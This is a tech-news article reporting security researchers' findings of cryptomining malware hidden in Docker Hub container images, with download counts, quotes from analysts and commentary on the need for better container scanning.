Docker Hub Distributing Cryptomining Malware?

A pair of cybersecurity reports published this week suggests the level of cryptomining malware lurking in the Docker Hub repository is potentially greater than most IT teams realize.

Aqua Security, a provider of tools for scanning container images, reports it has discovered no fewer than 23 container images stored in Docker Hub that had a potentially unwanted application (PUA) hidden either within their image layers or that could be downloaded into instantiated containers during runtime.

The images then download and run a cryptocurrency miner during runtime that appears to be downloading malicious elements also during runtime from the GitHub code repository.

Assaf Morag, lead data analyst for Aqua Security, says the images have been downloaded more than 330,000 times and appear to have been created by a hacking group based in Algeria.

That report comes on the heels of a similar finding from the Unit 42 research arm of Palo Alto Networks (PAN), which identified a malicious Docker Hub account active since October 2019 that was hosting six malicious images that mine Monero cryptocurrency.

The account, since deactivated, was used to house coin mining code within the image that evaded detection by using network anonymizing tools such as ProxyChains and Tor.

Jen Miller-Osborn, deputy director for threat intelligence at Unit 42, says the images hosted on this account collectively have been pulled more than 2 million times. One of the wallet IDs identified as being used by the cybercriminals to collect cryptocurrency earned more $36,000.

In both cases, cryptomining malware was embedded within what appears to be a vetted container image. Once installed, crypto miners typically only consume a small amount of the available processing power, which Miller-Osborn notes is why so many organizations tend to view cryptomining malware as more of a nuisance than cybersecurity threat.

How much cryptomining malware lurks on Docker Hub or other repositories is unknown. Cybercriminals have been employing containers to deploy cryptomining malware surreptitiously within IT environments for years. Much like any developer of software, cybercriminals are embracing containers to create malware that can run anywhere and is simple to update. Platforms such as Docker Hub then provide an efficient mechanism to distribute that malware.

Morag says now that cybersecurity professionals have access to dynamic application security testing (DAST) tools, it is becoming easier to discover malware embedded within container images. As such, the number of malware discoveries involving containers should increase sharply. That doesn’t necessarily mean, however, there is more malware showing up in repositories; rather, it just means cybersecurity teams are getting better at discovering what malware is already there.

While cryptojacking malware may seem like a victimless crime, Miller-Osborn says IT organizations are left to wonder what other types of malware might have been embedded with the container images they have downloaded.

Less clear, of course, is to what degree development teams might start relying on platforms other than Docker Hub to distribute container images, given the rise of alternatives. Regardless of the platform employed, it’s apparent the depth and frequency of container scanning need to improve.

Mike Vizard

Mike Vizard is a seasoned IT journalist with over 25 years of experience. He also contributed to IT Business Edge, Channel Insider, Baseline and a variety of other IT titles. Previously, Vizard was the editorial director for Ziff-Davis Enterprise as well as Editor-in-Chief for CRN and InfoWorld.

Mike Vizard has 1615 posts and counting. See all posts by Mike Vizard